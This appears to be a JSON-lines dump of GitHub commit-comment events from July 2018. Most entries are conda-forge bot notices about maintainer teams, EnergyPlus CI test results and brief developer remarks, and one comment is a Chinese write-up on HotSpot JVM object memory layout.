{"id":"7992603971","type":"CommitCommentEvent","actor":{"login":"gdlcf88"},"repo":{"name":"Bphots/HotsWeekReporter"},"payload":{"comment":{"id":29773334,"position":147,"line":1765,"path":"public/scripts/hotsweek/js/presets.js","commit_id":"88abdf513eccd9155e14f7b5185e3c9f690e7657","created_at":"2018-07-20T02:33:26Z","updated_at":"2018-07-20T02:33:26Z","author_association":"MEMBER","body":"缺乏实用性"}},"created_at":"2018-07-20T02:33:26Z"}
{"id":"7992607514","type":"CommitCommentEvent","actor":{"login":"Bluscream"},"repo":{"name":"Splamy/TS3AudioBot"},"payload":{"comment":{"id":29773339,"position":61,"line":null,"path":"TS3AudioBot/Web/Api/OpenApiGenerator.cs","commit_id":"8ec5eb909efe24f4c0b667f8ca6d4cf70eecf139","created_at":"2018-07-20T02:34:49Z","updated_at":"2018-07-20T02:34:49Z","author_association":"CONTRIBUTOR","body":"Ahh okay :)"}},"created_at":"2018-07-20T02:34:49Z"}
{"id":"7992608373","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/neuron-feedstock"},"payload":{"comment":{"id":29773340,"position":null,"line":null,"path":null,"commit_id":"11cd590130d313cfb2d44c1625db2c4aef025d2b","created_at":"2018-07-20T02:35:09Z","updated_at":"2018-07-20T02:35:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @minrk were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:35:09Z"}
{"id":"7992612191","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/python-snap-feedstock"},"payload":{"comment":{"id":29773342,"position":null,"line":null,"path":null,"commit_id":"6721eebb3fd5630c23d9c5a90614bd2b5048d818","created_at":"2018-07-20T02:36:38Z","updated_at":"2018-07-20T02:36:38Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:36:38Z"}
{"id":"7992612727","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/qpdf-feedstock"},"payload":{"comment":{"id":29773344,"position":null,"line":null,"path":null,"commit_id":"d3fe4225a422b194f74669b17403418e3ae55aac","created_at":"2018-07-20T02:36:52Z","updated_at":"2018-07-20T02:36:52Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jenzopr were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:36:52Z"}
{"id":"7992613941","type":"CommitCommentEvent","actor":{"login":"luckman212"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29773345,"position":null,"line":null,"path":null,"commit_id":"040a1579e474290abfc7a4a445e310ce8e462847","created_at":"2018-07-20T02:37:12Z","updated_at":"2018-07-20T02:37:12Z","author_association":"MEMBER","body":"That would definitely be nice, but adding those knobs to the GUI would be a bigger change. The small script change I suggested above seems like it would be a minor improvement, and doesn't require any other immediate changes to the GUI."}},"created_at":"2018-07-20T02:37:12Z"}
{"id":"7992616201","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-fontbitstreamvera-feedstock"},"payload":{"comment":{"id":29773347,"position":null,"line":null,"path":null,"commit_id":"7edd45a9a472a2d8fd73600312b9d92423998ec0","created_at":"2018-07-20T02:38:02Z","updated_at":"2018-07-20T02:38:02Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jenzopr were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:38:02Z"}
{"id":"7992618209","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-fontliberation-feedstock"},"payload":{"comment":{"id":29773349,"position":null,"line":null,"path":null,"commit_id":"cd6f4a17615b8b5f7a43057ec178e7c7d65ff216","created_at":"2018-07-20T02:38:40Z","updated_at":"2018-07-20T02:38:40Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jenzopr were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:38:40Z"}
{"id":"7992618373","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-fontquiver-feedstock"},"payload":{"comment":{"id":29773350,"position":null,"line":null,"path":null,"commit_id":"8ee7f4b3568cdb2fc6d7be7871f047f65354a438","created_at":"2018-07-20T02:38:44Z","updated_at":"2018-07-20T02:38:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jenzopr were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:38:44Z"}
{"id":"7992620285","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29773353,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-20T02:39:30Z","updated_at":"2018-07-20T02:39:30Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.17%25-green.png)</a>\n"}},"created_at":"2018-07-20T02:39:30Z"}
{"id":"7992621055","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/resonate-feedstock"},"payload":{"comment":{"id":29773354,"position":null,"line":null,"path":null,"commit_id":"94816945fb72aefc7e940f3a2036abe97e4ae00f","created_at":"2018-07-20T02:39:46Z","updated_at":"2018-07-20T02:39:46Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @alexetnunes were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @alexetnunes were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:39:46Z"}
{"id":"7992622556","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/scikit-fuzzy-feedstock"},"payload":{"comment":{"id":29773356,"position":null,"line":null,"path":null,"commit_id":"13f6bf958b35077ca34395a27616ffa1fad1d1e5","created_at":"2018-07-20T02:40:19Z","updated_at":"2018-07-20T02:40:19Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jdwarner were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @jdwarner were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:40:19Z"}
{"id":"7992623257","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29773358,"position":null,"line":null,"path":null,"commit_id":"4723671fb9215b16d2db7e2bb6d534e4a645deb9","created_at":"2018-07-20T02:40:36Z","updated_at":"2018-07-20T02:40:36Z","author_association":"COLLABORATOR","body":"Thanks for the fix"}},"created_at":"2018-07-20T02:40:36Z"}
{"id":"7992623969","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29773359,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-20T02:40:56Z","updated_at":"2018-07-20T02:40:56Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T02:40:56Z"}
{"id":"7992624348","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sphinxbase-feedstock"},"payload":{"comment":{"id":29773360,"position":null,"line":null,"path":null,"commit_id":"787450befaf8b5a22d72c084b11243237b1e066d","created_at":"2018-07-20T02:41:05Z","updated_at":"2018-07-20T02:41:05Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:41:05Z"}
{"id":"7992625780","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sphinxtesters-feedstock"},"payload":{"comment":{"id":29773365,"position":null,"line":null,"path":null,"commit_id":"314a2325251f6a25efe61a2875efd87f452dffb7","created_at":"2018-07-20T02:41:42Z","updated_at":"2018-07-20T02:41:42Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:41:42Z"}
{"id":"7992626092","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/starry-feedstock"},"payload":{"comment":{"id":29773366,"position":null,"line":null,"path":null,"commit_id":"85d51b0974bcc1be6ed917eaddc1c394a4352377","created_at":"2018-07-20T02:41:50Z","updated_at":"2018-07-20T02:41:50Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @rodluger were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @rodluger, @dfm were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:41:50Z"}
{"id":"7992627526","type":"CommitCommentEvent","actor":{"login":"kristalls"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29773369,"position":18,"line":16,"path":"lesson1/triangle.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-20T02:42:24Z","updated_at":"2018-07-20T02:42:24Z","author_association":"OWNER","body":"Не нашел как сделать отдельную переменную которая возвращает true/false."}},"created_at":"2018-07-20T02:42:24Z"}
{"id":"7992629462","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/stem-feedstock"},"payload":{"comment":{"id":29773372,"position":null,"line":null,"path":null,"commit_id":"3d4ffcbbf65c10b1193d14584d6389535cadf9ba","created_at":"2018-07-20T02:43:07Z","updated_at":"2018-07-20T02:43:07Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @sekoud were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @sekoud were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:43:07Z"}
{"id":"7992630585","type":"CommitCommentEvent","actor":{"login":"malihong123"},"repo":{"name":"malihong123/web"},"payload":{"comment":{"id":29773375,"position":null,"line":null,"path":null,"commit_id":"4eb782b74d70871435ed789e241c71c35306562c","created_at":"2018-07-20T02:43:32Z","updated_at":"2018-07-20T02:43:32Z","author_association":"OWNER","body":"零基础学院"}},"created_at":"2018-07-20T02:43:32Z"}
{"id":"7992630833","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/texext-feedstock"},"payload":{"comment":{"id":29773376,"position":null,"line":null,"path":null,"commit_id":"c77e74be6da25953f1939996428c8da8a49eb2a3","created_at":"2018-07-20T02:43:37Z","updated_at":"2018-07-20T02:43:37Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:43:37Z"}
{"id":"7992631483","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29773378,"position":null,"line":null,"path":null,"commit_id":"501c3cc8d09a0a3a147e4cf3a830407338c63add","created_at":"2018-07-20T02:43:52Z","updated_at":"2018-07-20T02:43:52Z","author_association":"OWNER","body":"完成 第七章 会话管理"}},"created_at":"2018-07-20T02:43:52Z"}
{"id":"7992632994","type":"CommitCommentEvent","actor":{"login":"Etothepowerof26"},"repo":{"name":"Zeni44/underdone"},"payload":{"comment":{"id":29773381,"position":null,"line":null,"path":null,"commit_id":"c2d7fe0add032a4fd2c4ff30464524fe4c990866","created_at":"2018-07-20T02:44:29Z","updated_at":"2018-07-20T02:44:29Z","author_association":"COLLABORATOR","body":"this was literally pointless"}},"created_at":"2018-07-20T02:44:29Z"}
{"id":"7992634987","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ukcensusapi-feedstock"},"payload":{"comment":{"id":29773388,"position":null,"line":null,"path":null,"commit_id":"0b823b64cd068d9dd442d06011d091c48418f597","created_at":"2018-07-20T02:45:16Z","updated_at":"2018-07-20T02:45:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @virgesmith were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @virgesmith were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:45:16Z"}
{"id":"7992635359","type":"CommitCommentEvent","actor":{"login":"dbevans"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29773390,"position":null,"line":null,"path":null,"commit_id":"18bc42c8c8dc99b59caf2a12c336794d8e539234","created_at":"2018-07-20T02:45:26Z","updated_at":"2018-07-20T02:45:26Z","author_association":"CONTRIBUTOR","body":"Slightly premature as the follow recursive dependencies are not yet available:\r\n\r\n$ port echo rdepof:py37-gobject3 and py37-\\*\r\nError: Port py37-hypothesis not found\r\nError: Port py37-zopeinterface not found"}},"created_at":"2018-07-20T02:45:26Z"}
{"id":"7992637589","type":"CommitCommentEvent","actor":{"login":"elitecodesolutions"},"repo":{"name":"watir/nerodia"},"payload":{"comment":{"id":29773391,"position":null,"line":null,"path":null,"commit_id":"2a7614c39998be1824d32737406892276d8638f5","created_at":"2018-07-20T02:46:02Z","updated_at":"2018-07-20T02:46:02Z","author_association":"NONE","body":"Are there any examples of setting the default browser or using Internet Explorer?"}},"created_at":"2018-07-20T02:46:02Z"}
{"id":"7992637696","type":"CommitCommentEvent","actor":{"login":"shemic87"},"repo":{"name":"dmca-services/api"},"payload":{"comment":{"id":29773392,"position":1,"line":16,"path":"README.md","commit_id":"2e05545f8771f2db92309933d04e7a0d7ccb3ce0","created_at":"2018-07-20T02:46:03Z","updated_at":"2018-07-20T02:46:03Z","author_association":"NONE","body":"https://www.dmca.com/badges.aspx?ref=badge-carousel"}},"created_at":"2018-07-20T02:46:03Z"}
{"id":"7992637793","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ukpopulation-feedstock"},"payload":{"comment":{"id":29773393,"position":null,"line":null,"path":null,"commit_id":"e40a08681b1018e8d9474f42b69100f7d0bba454","created_at":"2018-07-20T02:46:04Z","updated_at":"2018-07-20T02:46:04Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @virgesmith were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @virgesmith, @tomalrussell were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:46:04Z"}
{"id":"7992640082","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/vacumm-data-feedstock"},"payload":{"comment":{"id":29773395,"position":null,"line":null,"path":null,"commit_id":"89cb217b250b20548db977c49e775294598d50f7","created_at":"2018-07-20T02:46:48Z","updated_at":"2018-07-20T02:46:48Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @stefraynaud were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @stefraynaud were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:46:48Z"}
{"id":"7992641360","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/viscm-feedstock"},"payload":{"comment":{"id":29773396,"position":null,"line":null,"path":null,"commit_id":"6e40ae4bbcc4374b72dcba1d37ef60f61e42e93c","created_at":"2018-07-20T02:47:20Z","updated_at":"2018-07-20T02:47:20Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kthyng were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:47:20Z"}
{"id":"7992656582","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29773417,"position":null,"line":null,"path":null,"commit_id":"89b8a98c70388a90f17c586b27c4ee7140ef6f34","created_at":"2018-07-20T02:53:39Z","updated_at":"2018-07-20T02:53:39Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-102](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-102).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-102-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-20T02:53:39Z"}
{"id":"7992658443","type":"CommitCommentEvent","actor":{"login":"dongych"},"repo":{"name":"dongych/javavcode"},"payload":{"comment":{"id":29773422,"position":null,"line":null,"path":null,"commit_id":"ec5fc7d6465f60b0bc471a50121520abbd67317d","created_at":"2018-07-20T02:54:24Z","updated_at":"2018-07-20T02:54:24Z","author_association":"OWNER","body":"# HotSpot 虚拟机对象探秘\r\n\r\n## 对象的内存布局\r\n\r\n在 HotSpot 虚拟机中，对象的内存布局分为以下 3 块区域：\r\n\r\n* 对象头（Header）\r\n* 实例数据（Instance Data）\r\n* 对齐填充（Padding）\r\n\r\n![object-memory-layout.png](http://p9ucdlghd.bkt.clouddn.com/object-memory-layout.png)\r\n\r\n### 对象头\r\n\r\n对象头记录了对象在运行过程中所需要使用的一些数据：\r\n\r\n* 哈希码\r\n* GC 分代年龄\r\n* 锁状态标志\r\n* 线程持有的锁\r\n* 偏向线程 ID\r\n* 偏向时间戳\r\n\r\n对象头可能包含类型指针，通过该指针能确定对象属于哪个类。如果对象是一个数组，那么对象头还会包括数组长度。\r\n\r\n### 实例数据\r\n\r\n实例数据部分就是成员变量的值，其中包括父类成员变量和本类成员变量。\r\n\r\n### 对齐填充\r\n\r\n用于确保对象的总长度为 8 字节的整数倍。\r\n\r\nHotSpot VM 的自动内存管理系统要求对象的大小必须是 8 字节的整数倍。而对象头部分正好是 8 字节的倍数（1 倍或 2 倍），因此，当对象实例数据部分没有对齐时，就需要通过对齐填充来补全。\r\n\r\n> 对齐填充并不是必然存在，也没有特别的含义，它仅仅起着占位符的作用。\r\n\r\n## 对象的创建过程\r\n\r\n### 类加载检查\r\n\r\n虚拟机在解析`.class`文件时，若遇到一条 new 指令，首先它会去检查常量池中是否有这个类的符号引用，并且检查这个符号引用所代表的类是否已被加载、解析和初始化过。如果没有，那么必须先执行相应的类加载过程。\r\n\r\n### 为新生对象分配内存\r\n\r\n对象所需内存的大小在类加载完成后便可完全确定，接下来从堆中划分一块对应大小的内存空间给新的对象。分配堆中内存有两种方式：\r\n\r\n- **指针碰撞**<br>\r\n如果 Java **堆中内存绝对规整**（说明采用的是“**复制算法**”或“**标记整理法**”），空闲内存和已使用内存中间放着一个指针作为分界点指示器，那么分配内存时只需要把指针向空闲内存挪动一段与对象大小一样的距离，这种分配方式称为“**指针碰撞**”。\r\n\r\n- **空闲列表**<br>\r\n如果 Java **堆中内存并不规整**，已使用的内存和空闲内存交错（说明采用的是**标记-清除法**，有碎片），此时没法简单进行指针碰撞， VM 必须维护一个列表，记录其中哪些内存块空闲可用。分配之时从空闲列表中找到一块足够大的内存空间划分给对象实例。这种方式称为“**空闲列表**”。\r\n\r\n### 初始化\r\n\r\n分配完内存后，为对象中的成员变量赋上初始值，设置对象头信息，调用对象的构造函数方法进行初始化。\r\n\r\n至此，整个对象的创建过程就完成了。\r\n\r\n## 对象的访问方式\r\n\r\n所有对象的存储空间都是在堆中分配的，但是这个对象的引用却是在堆栈中分配的。也就是说在建立一个对象时两个地方都分配内存，在堆中分配的内存实际建立这个对象，而在堆栈中分配的内存只是一个指向这个堆对象的指针（引用）而已。 那么根据引用存放的地址类型的不同，对象有不同的访问方式。\r\n\r\n### 句柄访问方式\r\n\r\n堆中需要有一块叫做“句柄池”的内存空间，句柄中包含了对象实例数据与类型数据各自的具体地址信息。\r\n\r\n引用类型的变量存放的是该对象的句柄地址（reference）。访问对象时，首先需要通过引用类型的变量找到该对象的句柄，然后根据句柄中对象的地址找到对象。\r\n\r\n![&#x53E5;&#x67C4;&#x8BBF;&#x95EE;&#x65B9;&#x5F0F;](https://camo.githubusercontent.com/7ee54330d43ad58eebde3e515da7b2aeb0553ffe/687474703a2f2f696d672e6d792e6373646e2e6e65742f75706c6f6164732f3230313230392f32362f313334383635393234325f373035352e6a7067)\r\n\r\n### 直接指针访问方式\r\n\r\n引用类型的变量直接存放对象的地址，从而不需要句柄池，通过引用能够直接访问对象。但对象所在的内存空间需要额外的策略存储对象所属的类信息的地址。\r\n\r\n![&#x76F4;&#x63A5;&#x6307;&#x9488;&#x8BBF;&#x95EE;&#x65B9;&#x5F0F;](https://camo.githubusercontent.com/a8df9de317d745437dfb4da97509c7eab36f6ce1/687474703a2f2f696d672e6d792e6373646e2e6e65742f75706c6f6164732f3230313230392f32362f313334383635383630355f353231312e6a7067)\r\n\r\n需要说明的是，HotSpot 采用第二种方式，即直接指针方式来访问对象，只需要一次寻址操作，所以在性能上比句柄访问方式快一倍。但像上面所说，它需要**额外的策略**来存储对象在方法区中类信息的地址。\r\n\r\n（完）\r\n---\r\n👉 [Previous](/docs/01-jvm-memory-structure.md)<br>\r\n👉 [Next](/docs/03-gc-algorithms.md)<br>\r\n👉 [Back to README](../README.md)"}},"created_at":"2018-07-20T02:54:24Z"}
{"id":"7992658672","type":"CommitCommentEvent","actor":{"login":"Arcovv"},"repo":{"name":"Arcovv/RxSwift"},"payload":{"comment":{"id":29773424,"position":19,"line":36,"path":"RxCocoa/Common/ControlTarget.swift","commit_id":"0b12d21d34aa184a82b28967dd4b505e16cf2ba2","created_at":"2018-07-20T02:54:29Z","updated_at":"2018-07-20T02:54:29Z","author_association":"OWNER","body":"Em... I only test in Xcode 10. Maybe I should adapt for Xcode 9 also."}},"created_at":"2018-07-20T02:54:29Z"}
